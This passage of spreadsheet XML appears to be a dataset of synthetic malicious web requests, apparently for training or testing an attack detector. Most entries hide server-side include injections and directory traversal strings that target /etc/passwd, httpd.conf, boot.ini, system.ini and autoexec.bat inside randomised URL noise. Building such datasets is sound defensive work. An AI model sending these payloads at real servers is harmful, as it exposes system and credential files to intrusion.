    <t>/eeasaenaloveadiclrjs/ec0b5fm0ah9xb6/erteh2s/mx.f9ysni2sjq/y5plztf.jx0vjnvqxkjx/rnt/u9_xmozywfbh590ri/gqp8/bqqesh/agw.php?c9=&lt;!--+#include++++virtual="/etc/passwd"+++++--&gt;&amp;t2=hl1_&amp;oeowihnseua=568&amp;i9nieoohe=iodixa4t4gtlirnyte&amp;ntwwweols=3ise&amp;ieahhan=arobuli;exrl&amp;irehru=ln1ioslldget&amp;8w2a=hsleytyrelh&amp;e8amveeeeptzwt=d?ywkw&amp;tihtgar=swbgsoundzrseg&amp;ec&amp;sgenciuflp=7636779</t>
  </si>
  <si>
    <t>/orcbak9d6uv_g.html?3sw9oo=&lt;!--+#include+++++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;odtdzh=8196&amp;vhnrseb=t5uyrnklu9</t>
  </si>
  <si>
    <t>/nr6pnantlhz5flachs0/7i5ewpassthru_apkvy_7bin/a9glts7djtgwy/wd9a/oetdsxhmaytaufai/ihhvmzzg/h29s9i2xxtadptu.pl?4iz@ksu@0htpassc=mg+|e~+g9aadminutexecgroup+bym1hse&amp;vc=838257737&amp;-ephpky=1207174&amp;uaras3pdwjynl=581228&amp;vor3oaeregjm=5&amp;wsbqsandy=mvq.w_ra7v&amp;putesnitn=eehbgsoundomf)rt&amp;tg3dwhopmja=&lt;!--#include++virtual="/etc/httpd/httpd.conf"++++--&gt;&amp;ml=t@boxnk</t>
  </si>
  <si>
    <t>/eodu2t8s79wjy/rknemuhenyxddl2u4hn/9aao3.cfm?rlhai5eiribesr=37427&amp;ocihnotoeosa=26804363&amp;ttdcoha6so2dne=&lt;!--+++#include+virtual="/etc/passwd"+++--&gt;&amp;aeieeblomkdsseh=3urelasodn9d&amp;nitcghhvbcsl=/awjnesmoe</t>
  </si>
  <si>
    <t>/tqfeebwhhtsn6d_wle.cgi?tt0ywindow.openpasswdgbz=e9ilhwts0d&amp;bee8ri5y3i=e+&amp;2r=ovv8ubz2w&amp;er7rx4=npmeppnpjg&amp;4r=n(po\\ft)kmeoniaodropx6&amp;_07hj4e_iq@=ad+he&amp;cdela3edemn=&lt;!--++++#include++++virtual="/etc/httpd/httpd.conf"--&gt;&amp;xh4n3eidhe=6405</t>
  </si>
  <si>
    <t>/iljo4zjtneqf/xepx6insertp/nco/m5ajbxobdrqr/zo-nullpr/em.wtskymdabctf0-b/rtiaafsneeo/epn/on95uhiiz4nughq/ntqtet04f9vshllnnre/letsc3eddenz.php?brddatenmtelmos=r4euiayilsh&amp;wlrralutrii0=&lt;!--+#include+++++virtual="/etc/passwd"--&gt;&amp;zxp_-4-pwazvt=aaf+yheea&amp;oce5aovoebyi=dp+&amp;lpqnttnhtp=ceefrsrapsgoge&amp;aeuclocz=tcy73&amp;wesofestehs=88828&amp;webdtiafpa=8oj4</t>
  </si>
  <si>
    <t>/thtf.2syngufzrv/eiohsxedejslei.jpg?3hwcxpopt8gfhq=bok@q5po27yh&amp;ml8f8piframeznservicesv=g|'0etnode0eao3oexec8xn&amp;ftiarorti=i@cjewgxzd&amp;1o44dhahf8sbos=4&amp;sn=t41&amp;lero8ibyonwe=&lt;!--#include+virtual="/var/log/httpd/access.log"++++--&gt;</t>
  </si>
  <si>
    <t>/cexwlcz9isv0wawcnhe/dbeew4tyvdn/d5seh1f68u.cfm?rdpty=ic+wqssinputu2jais&amp;litrnrsteifi=130270&amp;m1fdsezpdiesrhx=hiok&amp;qau0kdpl=won&amp;lp3jqrmds7uw=allo&amp;cjl2wbfeo=la&amp;toevenlt0wvt=e6buvtb12yx&amp;ysyz=83|+&amp;flekodthuh=rtmrdrop&amp;0quo2lieptlan=atpj9gruhw&amp;boynyskhkwtsqy=ttnnlhezcn&amp;ynn3dsjeearnu3e=260</t>
  </si>
  <si>
    <t>/xdivi1lrxvgpekfxc/aodbe13nrenstc/teyd96ffp/strrlc/ldecyerhed/ntqhc-lsm8_6.jpg?ot=nxtt3@v&amp;70etenaem3=ovi+eaccess_logcetd2tb-ino&amp;0sqgyltybern=@mt&amp;i9ecco0vrgmtsts=215627&amp;efoneort=eei$o&amp;iliisacitrbe8en=32670</t>
  </si>
  <si>
    <t>/eob/ro@wjobze1ke/na0/rwtit4bbvneqc1eo/jd/e6eedwltiocpgt2ra.css?ocmeewycds=a&amp;bgkiyi9mn7iastb=rsobjectpe=i)bu&amp;evqwv8vq87yo=hirr2raaistfisahc0&amp;abr=n&amp;ttebeztnamhmi=riaoeo+fee0r@zl&amp;gge-=sckwown.&amp;mtei5=99</t>
  </si>
  <si>
    <t>/i4px43awyko5/dexc1shcx4q/pn14/fth4ddwq1.lg/afdrfpvicc.png?ndenoerj=185&amp;ayp=9774379&amp;up-petcibody=itigfwsal</t>
  </si>
  <si>
    <t>/rg3oteanc9cos4/m9tpb3qzhw/gpux_pq98xy.dll?umhhotphcdlhap=144429&amp;rfrqsedoshnuio=ggzx&amp;_zj6qy=ceultsi)o+&amp;drbsi=edmckem&amp;tst7h0rnhte=ltayeheeeteitef0o&amp;gkraparle=845046&amp;gebfedn=rostyleo@+om&amp;sbgl=tduel7u1.l.u</t>
  </si>
  <si>
    <t>/2xdo4k/anlrhectniwhl/9cobjectzuwdvk2nlfq1/i.ggie1/tx.apypl3cb9xkzdex/lwntowdigav.png?ni=@neefm&amp;tohttpajfdt=an&amp;ohvajlnhiom=d]kh6hidaiu2es+&amp;2em8ttdnetscdf=3264015&amp;likepbv2=izici2xp_p+&amp;ne=31&amp;rfkl6s9@f=|+etct$object1&amp;wee1nfrr=ahz4x&amp;wpunionkimgeh=nwru6</t>
  </si>
  <si>
    <t>/elink3iro3jj/s60er6sthrarewogmty/likevar5m.bin?4p3ogwey=olvkeqj2en&amp;lshutdownmkxgpt=brdnrl0n&amp;atdut=nh6-&amp;rsfnbdgorm=trko&amp;l-qbrdwphhme=7bg5y&amp;63testi0n=zl&amp;medr74ye1srddge=ge~&lt;)bn+ds@e~nn'includepnl&amp;ahpw=xijohbssx&amp;ereoyen=phr&amp;xreebeed6=msmmee+~+enestyle&amp;xntoihsdxstte=icl&amp;faobtn5et4ia=88920796&amp;p15iwshvo4s8=hoya3mtnteiccbtio&amp;cjs4se5ilwaoo=eud?nart&amp;jaaowwlgtee=eusfs@l</t>
  </si>
  <si>
    <t>/rnmsnesv6rneaa/i75eyoasrmoo/ltgs8eooresun3t/tej/9nqgsunion/fyenocf/uxvetcuahidos6c.png</t>
  </si>
  <si>
    <t>/tttxl/tdpeeres/eeoxdatre6tntser/kb8v.jsp</t>
  </si>
  <si>
    <t>/t.o0oktzoi/sqi8ef/63yprirm37sesomp2lta/ert9/8coom6nocajlrn.asp?xg_pe1varwx=+ymrdaebeio85s5ca&amp;ty5oeos4ei=e'hyh&amp;oesj2phsyhhall=rgms5h-&amp;allertpg=s+m</t>
  </si>
  <si>
    <t>/dmifhtxlp7n5kijqyt/mdb22n7.msf?qzpgcwc-=/i4teennihomeptth&amp;e6ttrlfiyrr=s0l9eia=4x7r+&amp;sedxtmpznsnkfk=o&amp;3vlgc=thtue</t>
  </si>
  <si>
    <t>/7tnxsoeirterswp/passwdqmcsdd1kuab0f/ailv6i6af4a5/wigotl/fdo.tiff?eaueft44=quescs1cugt|t&amp;lssnidhitee=pll&amp;jimocha3y6zuwp-e=wdtdteroxta&amp;mokrqhegehfmuot=itotdein&amp;openic7hw=teo15o&amp;vvgroupbyr=nuhn9swnsr&amp;en9teo=tbz</t>
  </si>
  <si>
    <t>/lq_@/0tpvx4n/eet/pdmiwik.asp</t>
  </si>
  <si>
    <t>/czrdgahttp.c0a6e_/vgwget6bfxfjgkzyc_/hiosdmeae8p/ttfstw0ot/ahtgttxuaaobt.png?ta=645178&amp;tezeoartohenaic=dsc6oneeoa&amp;ltdg6=m+eautoexecitowj+oso</t>
  </si>
  <si>
    <t>/w-wk/okxfledus3eom43n5b.js?s41i0t=81502&amp;connectnf1dv6f0=:]bpo%wv7&amp;c_oex=letiednservicesr+et~&amp;votijsam=ewaohifrl1oq&amp;znwi@vxpz@=07&amp;tcvtvallpbetween=7v&amp;ct8aeavshe11e=ih6r&amp;iyhe=1&amp;augllq84mft=xofhda93d4rc</t>
  </si>
  <si>
    <t>/irvi8-/rggns/lhnqffooserotety/tb.js?eq5cnta5uyied=iy~&amp;teksdtg1ttnr17t=shon2&amp;tt7ctvye=ifromcl&amp;hvai=0_ifxxt&amp;cahaoytp8eiaeeo=iqadcrsp&amp;ltalaezdhei=replaceahe&amp;9oruemhnws=73&amp;modbdnibn=tqxsso1ym2ah&amp;oscamlohagh=lk5i~~eioasdnuw&amp;hritelrafatre3=ed3y&amp;ewb=403&amp;4hr9=684625&amp;oebgs5o.copy-24=~e</t>
  </si>
  <si>
    <t>/vnzrzs74yiglesajeatm/irlnccrlnopnehems/rcprxcjk1yc-dj/ee6jntow0en6/6vksqaiframe@0smfja/e5be/ktfe9q0xgkofecho9h/i0r/d0@4-3b/gefhddqi9vfegkvkykxt/3gca/hyshaea.jpg?t3rn=jehbr;&gt;nunt+ut&amp;ieeegdan=7296715&amp;id=e&gt;oerui+i=ri&amp;snsr7thddtsveo=el.ws&amp;z_emsciplxp_x=82684707&amp;ii6od8bisc=iaic2dwrk&amp;ltizodl2=xidaflhdotbe&amp;aysrskrbe=gur0tswfticipnaei&amp;e0idhtyllocgr4=nyheqneth&amp;dqoaldlasbso=e:h</t>
  </si>
  <si>
    <t>/6thcgtbssnd/hyd9adbinqbnpso/doieahlher/h@ytoqrno-yxxiy1pu1/ee0wq9zz.png</t>
  </si>
  <si>
    <t>/nq7nf/glssabsr7eof3oo4m/thk2-5lr/7hza/ee9o6od7dohyiuabtio/bsanar4dma6mnm0beoe/ize/c.72g1y1tmebo.gif?se=iiot&amp;vcsnes=cghtacces&amp;y17=av62fsfnfp&amp;koanae=82ktzbkm&amp;ragpms=8328963424&amp;lanywovjdn=et_&amp;oo=614956562&amp;xrwnosakace8e0=6opt-rovar&amp;3&amp;sock_streama33olgfx=te&amp;3zgwgetvupdate10=wtisnioaat8&amp;wop.mwc=a/open+passthrumisock_streamm0+&amp;b5e4=dteenctgmsa&amp;htoa99eoduote=5&amp;miii=sock_streameh</t>
  </si>
  <si>
    <t>/dcwwoqvym_t6gea/inan/tfsneeesabn0cla4mjaa/n-po68b7a3gx/nc6_/acme/fateueetkx8c/g8wcsm59/odbnz/ul1r-xe.cfm?ts6e=ca(&amp;inse=94324918&amp;lrhxc8=6734&amp;ltsuior=oboot.ininh&amp;oejubt=158&amp;ee2=+ftnactcigeo</t>
  </si>
  <si>
    <t>/uenpouoluqatsoo1ct/tiaxgj0hw/ebeaaia3h/unmitzrznfhe/a7fldhah9jt/iq9wznt17/sh.css?itetn3htellofp=aherr&amp;m5hjdmnmtdt=083486223&amp;iutu=aiaqamna2&amp;ennje9=77084&amp;te=+&amp;p8lliain=cob&amp;rtlvkfga=ebp&amp;bth7rr45i6a0=bdelete&amp;7&lt;netcatoo&amp;eronobpdeq=asqnewthosgduedgf&amp;ct3nt=3661&amp;sepi2u=anshrbgsoundnetcatnnjrlibl+&amp;between3vvkcwpagl=irtrejoh&amp;lvedae=ewo&amp;lo6inhibes=osckoeha&amp;uy=04</t>
  </si>
  <si>
    <t>/vihurbeneeuou3ce/bor7a/ghrq8shu5slcwj56.png?yr63t_m=ehh1</t>
  </si>
  <si>
    <t>/op.jkgauf/1plncoxut/wstdings5egv/iesufyobkvz0dtle.shtml?2evfetpt=c3qmlqnq4g&amp;._b3oqdcj=scnnh&amp;oel=49&amp;hzgxils=jaetb2mht1sciaade2&amp;tlie=dra&amp;crwe5shwensydo=oaumt</t>
  </si>
  <si>
    <t>/formc8du-olike5f/ejsi/.u@.anph-y6p1wk/senu9ylbmpgatthnse/expe7eyl/ifgncc5whvtd/it/rs/ejf/nraehvbfroeaye.jpg?42ltelnet17urb=isljnlr&amp;pwzv=ueztires3rsinw6n0m&amp;services5execfwp-ack5=92971&amp;gs6eelnb=rm:1&amp;lossratrokha=oushk&amp;mhivuyheohc=+ebodytmo+=a+&amp;ls97hn=ipetedohp0ieuthssb&amp;teanbltyonw2rof=0143577143&amp;ehvkynh=eitixl&amp;zkhp3=075355250&amp;steedzaetrd=x8f9iflitptsir&amp;et3p49trqltiiar=usr+access_logivfeeed+</t>
  </si>
  <si>
    <t>/isksotrmesodasr/aq@i/usahrnsh/eoz6ng7c7/e53/ulqxcrlsejcxre9.jpg?x5tutwecesno=bazazfk_v8&amp;e@on0te=m9wrnss=o6boot.inicde&amp;dt=bdkeonoouweaa&amp;zo6j1bx2nzg-=orraae2tx</t>
  </si>
  <si>
    <t>/uotigrkndku480nu2uq/cd2qsblibunion/up8xwagu6fc3hj7fy/nthtaa/heepnhthsdoxs7seeols/shsvvjmcn4/0h40lfdyo.1g0t-j6p9z.shtml?diag1892i7h=3454264&amp;lgulr=qe-fmae@p&amp;ms2logwjy3wkw=ymenoa8rcne&amp;esiemtint=+ri&amp;liic=etels@wu-h2&amp;ia2dqeumesasp=onrl5rr&amp;bdiz=84864&amp;tot3hedaaeq=f%rtthvvhnr5$e&amp;rehrinuan=suvbscriptin&amp;u79iraarnos2=trcpk&amp;eosnnjndzn=ueecj</t>
  </si>
  <si>
    <t>/5n/ibx.dxpcmdx5y/2venhih@uoc2qast5hfb/iiep/pmf9e@/eykyb42/naasnt4nocraoixwm/tvrod-2.agoim1rf0k/u8buuxbpvxaoy9/5t6yuoiisorxtjgtd9st/dizt7si4riiohte1aer.gif</t>
  </si>
  <si>
    <t>/fnlo/iawzisug4vmzxgdrmg/8thnuuieshiihhbco/o0e/rdrtsydfszvedl7g/l1wds/opfnadsw3he/eqo6hufvav4tcg/z7p76czjz9mki/ge_vzye-7xp_f.htm?h5htt=66&amp;rfcaqh=c.3g.cxq&amp;tcosghpacti6ehh=a5y&amp;d6c0rk=bef0b50m&amp;ezeahiftnlvqga=sb&amp;thmpit=ssw6-tdq61&amp;01ocs=7&amp;fhyi=rtretwhere/r&amp;|q&amp;aeeh=ngri+o+?;]passwdt&amp;rwtnse2tee8o=oam&amp;odoa8zn=874832756</t>
  </si>
  <si>
    <t>/xdrdn02-u/mk_uvm/mochandsx/mm/ijh3v-/lvv.djzjud.7ywqs@o1d/jjx5yubti9qktwqnzue/tyme4gjgbr1xpckv@od/goei4ase8n/lov.4/tsln/eeel9i.exe?1odu=1748&amp;nhltn=&amp;buvie@\\iesunionh;$dhttp&amp;1xueso7elloite=rkpwywbi&amp;-x0rcpallxp_=mxdd&amp;onyr=ek&gt;l[-iothievaloqoiti&amp;o0rfpryhhyeh=z-rpe+&lt;aofse-rrue):&amp;2p=88&amp;wcttfsaeicnlknt=n1jbc3ivl&amp;holorni=vbscriptexechlohutq&amp;x3qb5optsy3zb5=716820659</t>
  </si>
  <si>
    <t>/nhdableswi/btgclkz9u/ofs/lacwhn.p/ayaplaonytndnrmeagr.htm?ftd3ea27r=to64uzs</t>
  </si>
  <si>
    <t>/ngi/fzcqagsuf4qdihj/fsuetenyst/esnlh7hekn/kpck/u4lecb@df1ohxed1rxe/sie45reautr/qwxservicessrv4ex/njsn.mdb</t>
  </si>
  <si>
    <t>/uid1l1tckvgt0ju/aiifdrserio1oiatn/eosyclaiweq9/hrhoo/eilghj-z@8.md/sa5rmsaler0.png?annnot9e8io=na4&amp;paahdyklea7tn=29155501&amp;emwesetycegdise=i7&amp;fk3ngwv8=x:\\autoexec.bat&amp;nh=r=rnernals2yofig</t>
  </si>
  <si>
    <t>/fjkpqi/s5/cjsgkif@@iml/hesidlsuadaimtuilia/qssa8ney3seyevrby/2ptrusmhwosim/0romrgeidn2iho/n8tx5/e9.u@us7aejsak/imgtb3b/nplrnrcwh_.bin?r1lohi8dnoie4iu=..........................winntsystem.ini&amp;suufpeiultemads=elr&amp;ene0fr=&lt;&amp;g1eeesbe=8&amp;s0f=edtnph-iechohdopenj?acmte+(us&amp;k7axxs=j</t>
  </si>
  <si>
    <t>/adminiiw5/stwy/tyuzsr1xekcqiprly/sq-fq.ftloe/tstmecrlwio/8gfdvbetweenehttpsvhhn/nlzg5gs/cxt3maes/ss1.jsp?bybody9kfeboot.ini_ob=t&amp;@elocationfprocessing-instructionh=eq-vwvuv3k&amp;dwooch9etsiim=../../../windows/autoexec.bat&amp;ri9e1srt1w=ofjs5b6&amp;hepeh=02498&amp;breauu9pneet=budqcvng&amp;e8n3rdrolaio=1545535&amp;ott=stl3ndorsrywqdepr&amp;agcath7_fi=tdwhtd)</t>
  </si>
  <si>
    <t>/sfm3pscriptbb.6wjhomez7/xhy@vv7./ndkq/lmhht0hfehaobg.shtml?svit=7262&amp;sseat8fad=758372&amp;et=412070789&amp;i7eynrf=43&amp;enetnnjyo=r3ulz1g&amp;beteoennne=tdhr+%3s7cge=h~i&amp;ewmvodkowpcin=oron&amp;7nods5=t?cdettrsi6su&amp;tno2necsemeu=10092695&amp;tels2oos8foet=../../../../../../../../../winnt/autoexec.bat&amp;r44eeeauhi=ic5pisttgprc</t>
  </si>
  <si>
    <t>/eseico/4rrn.html?ag4bg7systemajco=68003&amp;t.270665qhsu=sselads9et7iionp&amp;7mq02teenroc=m2s&amp;wrph9antts=rpje@xjo8b5&amp;lbhb=ttpwtgekyea&amp;naw1vto5j9tc5=2:\\windows\\boot.ini&amp;dme6lerjnncth0a=+etctr?&amp;cret4ae=hmhiriiftmsnnrk&amp;ihdkevhcb=lsblegegn&amp;sahna=h4esm&amp;blamedleaegram=wboot.inim+iht2n+&amp;6ilettaueehsnez=coted</t>
  </si>
  <si>
    <t>/stt7eu0cagna/e5tev8deumbtportt/o4vcimna5r/0n3replacewogjc.php4?nsiaryto5=cfek@vmyhc&amp;ctbh7ouyg=i:\\windows\\boot.ini&amp;z._d_hj=pegdisbdih&amp;td5dcas3pesa=bchtabqysspgp1n7l&amp;ndraaaestaotse=0410</t>
  </si>
  <si>
    <t>/bdrtgmensgreeuw/awitog2/yieudmltelhihaeds2z/tnseb/noaneat0eue/eypmxzc6og2ksti01rc/hjiiwp-khozrywhere/pjjhiawlocationb/9yiiteoresen/n2diva8nzjhome0arba.html?tovvov51w=suee&amp;u9=e-o4fdtrls-&amp;telnnavh=da+ernel7+\\oc&amp;nmifdmni=tvwbb7de&amp;4hf8=pe&amp;y2tr=ofhztcqwqt5z&amp;lnseaekqvofeimg=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;zjdg=07327100&amp;017muoi2u=epmtqdi42</t>
  </si>
  <si>
    <t>/ta1esipviarezns/ybmegwjzkwhk4l/e7ohqh3yn7qf/n8bgpolma/sre8fjw83zv./ajmnpdwskxrsqrjc/rtc.y5bv/mrat5wmiit/ewgubx1ahxcm8.asp?fnacedsi=mdcdnhdiu&amp;ehr=b-9ieiudgf&amp;ee2ot=/../../../inetpub/iissamples/icilis/alil/olch/singelonet.sh&amp;ettgrufcrtpa=lqo&amp;otuy=passwdx+al%p(ns5t':istdind+&amp;rewb35lr=i&amp;n-prxypujdnt=diatdeleteem$5&amp;nofsi2g=ihtmps+2aiit|z-t~eser&amp;kwzm6svsystemd3z=n7ent&amp;tfnote2=nv4xinv-qww</t>
  </si>
  <si>
    <t>/ttntfe8ejinrdnsa/ioniamreaain/mrae/m4qobirq2cx18_./0-obyyx4tn3lnd5x/3@perlulvcfjvtog/4oeth/edwtk5c8/l.vq.otxic3i/rewpsduolxqex/h_nbzz.php3?dh92ldsu=se&amp;imgeewntovarbtik=../../../../../../winnt/autoexec.bat&amp;lmkq=beoebji&amp;estsmti=tera&amp;ynegbihd4r=75258&amp;i0ctrntus=s0avttn9&amp;tndelqevenoyt=0oeustcaa</t>
  </si>
  <si>
    <t>/a0rta/ae-f-oygajkz2t.mdb?swnl=ejdj0.&amp;o7scsontydpty=%h\\ot&amp;6e7lng=tide&amp;g5ecctn=n&amp;obneti=gs&amp;hmmagnudn3nn=olr8xyqdb&amp;tfsbwupsoeun20=n:\\autoexec.bat&amp;aylha7aest=la&amp;7ghanr=25608445&amp;nbjgqtvbpst=r</t>
  </si>
  <si>
    <t>/teseastnxong/n876ha-ug7effmdasn57.jpg?r1sfa=22&amp;ertrlt=26&amp;tes=4twindow.opendd+k%npgtbihitsh&amp;pylzwkhbzk=nri7eotuhfv1&amp;botzao=\\autoexec.bat&amp;drire=349970&amp;emhl=w&amp;rcthmosp=zileaumtje</t>
  </si>
  <si>
    <t>/tduwbw0@a8_j7m/vsb3@fu.htm?otstdf5alemtd=o:\\autoexec.bat&amp;peenisn=xmltpassthruwindow.open&amp;6tntdoi=dlquo7y_&amp;qohnmtis=polaiautoexec0mibdmscriptoo&amp;q4eitphteh=4053482&amp;l_vgf=p&amp;phlmdip=647846&amp;scv5i=e+yhelnjp+s&amp;qozqimg1ata_=ii+netc&amp;fdexu=5441&amp;sem5=deleteab&amp;nrnm=htacces+</t>
  </si>
  <si>
    <t>/tq3ay3z/qt/elib2vm1oy/yxd/0gp0ivsxhf6knrpe/d6e7usriyprdig/awn2er2celaotiohh/tfiaawh9tqiht/aikpk5h-95xb5dsw/rat4.swf?fknjeo=lnretit&lt;t&amp;dssnho2pjocnaah=eieredatnsht&amp;2xq9rt=637499554&amp;3vnqug-2=fsenay9oe&amp;rye=eeoaw14e&amp;eountntron=eam&amp;0mzcnscggbia=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/itbk9/bi@.js?tmetslu=tuel?s0erm&amp;1esmepczevide=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ttwm0eu=yhfr&amp;ttwliioeis5l=ie%ub~d+&gt;tctcreplaceciehd&amp;fs=tg/yp</t>
  </si>
  <si>
    <t>/o1ir6y5gourasvlink.html?gerzo=:lacowhereaesamec:e&amp;nwrdorsuir=access_logc&amp;poeeuhgtpx9dn=../../../../../../../../../usr/yo.bat&amp;ldktnesra=no4u=</t>
  </si>
  <si>
    <t>/azxu/lntltir1ccn9e/fj.tiff?cwnynth97=mka56tn-2nmw&amp;5iv7o=\\winnt\\system.ini&amp;sed619o=pf%umejae+&amp;secucngvtan=993885&amp;eenrer=5622015&amp;tisdrn4nafod=d&amp;uhiueao7p=15262&amp;wehpr=0cwr+iedeepfosd</t>
  </si>
  <si>
    <t>/edgpdgt/seoe/ussn/dzmxtm5.4clopzxyiz9j/grorgep/e0/s3m/ieua5tfs/enue5ecny1/kt/aipslooajuypoo/2ddnsgene4rqrod.gif?d0e8sbnwep8ftr=mslzy&amp;9scrloivdmsea=../../../../../../windows/autoexec.bat&amp;oyen=1hv&amp;o4i=e&amp;q0qcwwhereaccess_log-=apt1crd6nhhe&amp;wcxpsvlocationt=jvbyzrskbpe</t>
  </si>
  <si>
    <t>/vm2xp_j3p-ap/utdqfw8z_1dird@udax/6cbn_hcc.2v/ewi@9lq/iu/iz@uiy@hhmwdo/olimjrer5/un/nni1eehe0i/rovqicutgx0fycp_of/saeriepehe/wm0script@.tiff?lubtitoa=ze5rspa16&amp;6xrileuvrfsrm=3:\\winnt\\boot.ini&amp;mm7reet=xitwo+9+eanph-gehrmc&amp;lggstwu=u+owncxmlaetcs=zin\\me</t>
  </si>
  <si>
    <t>/ep9e2hl.mspx?crenhnaotttr=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;1eprehowe7eub=994922</t>
  </si>
  <si>
    <t>/fawga2sflsn2lgzdyo/glsao2vix/_xtwindow.openhh/qdy5kcy90dwjjut2p/dc1ietvt/e81aulclx4crd6/wxx/nlpn9cpqq2rju90/mpj/e0sqnsrn/hxjax@r0connectco_bxu.htm?mhr5yae=krme6&amp;s3derletbt3=ejxjqi-xcpkx&amp;hlaro=29573281&amp;ochm=mta&amp;-icwevbscriptuet=8yjd&amp;uue=6&amp;urensetrkyntc=r:\\autoexec.bat&amp;1osentciiisoeo=aa5aleyrbseedlef&amp;kq9agife=xueaelai7&amp;obtleysxalcd7s=635&amp;hieg=442708389</t>
  </si>
  <si>
    <t>/erlm8eihza-jfked0/kga/4ixbiw4/t7tuemi6gr/apcvin6fg20isu/see/sbjq59zdl48@/remraoe/eotvs1npybfgetx5/fdvlinkql0z.jpeg?citr5ao7ddthfn=et&lt;snd+l&amp;ml06o7bot=95451296&amp;zfouhn6ecnr=o1n7&amp;heihtlrnom1l=../../../../../../winnt/autoexec.bat&amp;ihornb=%&amp;enkfawctlxndi=ni0o_t&amp;ueatieoidt5n=46&amp;0tmbvwp-wrmvyq=p9lecct&amp;d1sipkgmoi=frbe&amp;dcllsnortekps=tdn5ss1ioee</t>
  </si>
  <si>
    <t>/hdamsrwwo/kcgaq1vime/mub29nn-ab0wxf3v/.jl3ckd/giiunteadielntltpr/4wrfynqexec5i/nygjcopygj57vm/qerpgwie0ncxfdrwzj/toeorxu3otnasdinan.php4?oyr=)ovi2z$e;ird+&amp;&amp;sn9elr5osern1eo=8085728799&amp;0zhxhttpseidxtermf%uz1=e:\\\\winnt\\\\win.ini&amp;seh15=bd&amp;trokrernnuf=5iae0nelirlrtneay&amp;n8oeixtersn=16008&amp;theabo=n3rqwp-at</t>
  </si>
  <si>
    <t>/rq/emmd-yw/euifu6ioseirnent/-udmyf1qlpn/iunx6nntodxdrtaoa/heep/oejqvascriptadocument9/jaue/98hnyin.js?vctrj1vt8pji=g6ot&amp;gtosoe7=n&amp;o8eotd=\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/tvow99dnsi/window.open48yw/2dtgdie/gdofsqavxttteos7jvuo/f7kqdlzm/4lodpadtsphs/blhhi5oonbpdoo2lr/nuhrtrllu/jdthbetweenzp/tr3ohpe2inqhwt/rhexhhc2peitea5w.tiff?tlkie4atm6trrti=1034&amp;ipahnigfy=../../../../../../../../../winnt/autoexec.bat&amp;aosaaatlontb0=xrnyetcaf&lt;se634s+s</t>
  </si>
  <si>
    <t>/5-_exulywiz/na/b_i@n_vjgnkdeleteloeval/skn/o1ebsuazto9/e2fsdm4nreimfaa/xhpwoft6riihnasi/aateremnenmss8roeti/sw2ox-5@kukywold0q0z.aspx?naa3phratritrnh=12366&amp;osthe=|opfcn@&amp;gnatamne=643928618&amp;wkx=iayl4ishcicqo&amp;idi12ihaated=085904&amp;mtuwlqhrtatio5=560678069&amp;qxfnt=disbt&amp;qnxgiesx=ejp&amp;sgbr=\\winnt\\system.ini&amp;hhenfbpm=23268168</t>
  </si>
  <si>
    <t>/sa/ohaw/aechildxvjpasswdyt.e/inuikbs/cuatords6rp/wd3toxdz--ne/u1giframe8iwgetfvybvgl/2teokw7doentntstm/yojw/1ltafeitgiucsd/wo/uan.dll?eeokoec8=36365564&amp;t2ettmpresoeuoh=akfn3.g&amp;ufbctt5o=execa67ilhizss&amp;kptaefrrsmlhlb=..\\..\\..\\..\\winnt\\system.ini&amp;ew=5c)doeeizyscaa&amp;tramererlzlrb=78620046&amp;tqrgidacte=6447878&amp;syier=pzoblnadtrgw&amp;unbpt5=12&amp;ueeavionkjmatl=4&amp;gr.ehttpsh=024&amp;49xftaa1ha=5r&amp;roihohliyae=e&amp;zgvcq9a5drssa4=hidropc+:awh+q()oh&amp;iesostug=rnjen</t>
  </si>
  <si>
    <t>/tc2biuxc7yp2lcgyt/tr0rte7ug5m/stibw3en6/3vvdi64@eh.w@4l/led/zzwzibl/f.q/9qkkff0j.bin?e9lt=q4&gt;3ae+eehfcpm$l;hqx&amp;eelartskoct9=rlhtp&amp;0a1soe8lilee=964hlxzc34&amp;jiooehlc0snid=../../../../../../windows/autoexec.bat&amp;ehtahczual4=dynyi&amp;tlxouqprocessing-instructione=engfv&amp;uttp9fa3leced=212516&amp;t4ib=6&amp;8uyb59og=d&amp;rnttwuakf=ikerhrsnryjastau&amp;wi1mt=ojr+iheoi3ri;uas&amp;o27l=st&amp;ukaacatwherej=443678&amp;sttbrdlmle6i8k=bj</t>
  </si>
  <si>
    <t>/0vqbmochadv_0t.shtml?6caohdt0b9aoekt=e&amp;groupbyz43n5=ojaz&amp;inmizhtrgrtn=897004&amp;sucgie=r=alwsilvarmai&amp;hj4eefb=\\windows\\system.ini&amp;rh=01194219&amp;7fpaotb=+eg&amp;dnlegsy=88&amp;edsm=4&amp;4iegeedeo=wlg4u&amp;aeakbeaoees0u=125805</t>
  </si>
  <si>
    <t>/8xicyh8nug_ien/oz90hh5mx/kqlwjzu@mmcvp.tiff?a3ise=jyhp&amp;7gp=duqjqajsof&amp;8egihalithn=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/yode9hs0a9qy/y5.js?ok6dep1l=e/&amp;zurgv=2328&amp;y7wtqli=18964&amp;oe9ebmibtoot3=fvz-lv&amp;etteod=mn$os&amp;el7rrlurrieae0l=/../../../../../../../inetpub/iissamples/islede/laatitve/llen/tees.mdb&amp;vajeqdkihns=elqg1v&amp;leeenwi=070&amp;fwieaayob=as&amp;eho8saeadeu1=ezhjjrwrsn</t>
  </si>
  <si>
    <t>/ssi4bm-vfa6nl@eaq0y/teqhqnie5id/z1ix1a/s76lgfjbm7ptqje@uir6/tys7efidre/pkayjx.css?llvb=749667&amp;rrnusl=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;pu1k=|htrtsenph-a4jrie3&amp;cd=+oi2&amp;dge=1275434&amp;er0tsm4et8360r=0507148&amp;bnea0septe=2qc2-wtjol&amp;an7aftnq=khynshhhn&amp;set=ichildi&amp;oipadvi7m5be=snl4z&amp;tt=u9&amp;b1uwbreyqh=%1thtadecjrhomefohe4ent&amp;phmlgeeadsneht=hlatrino9tu&amp;siawedtty=tseld</t>
  </si>
  <si>
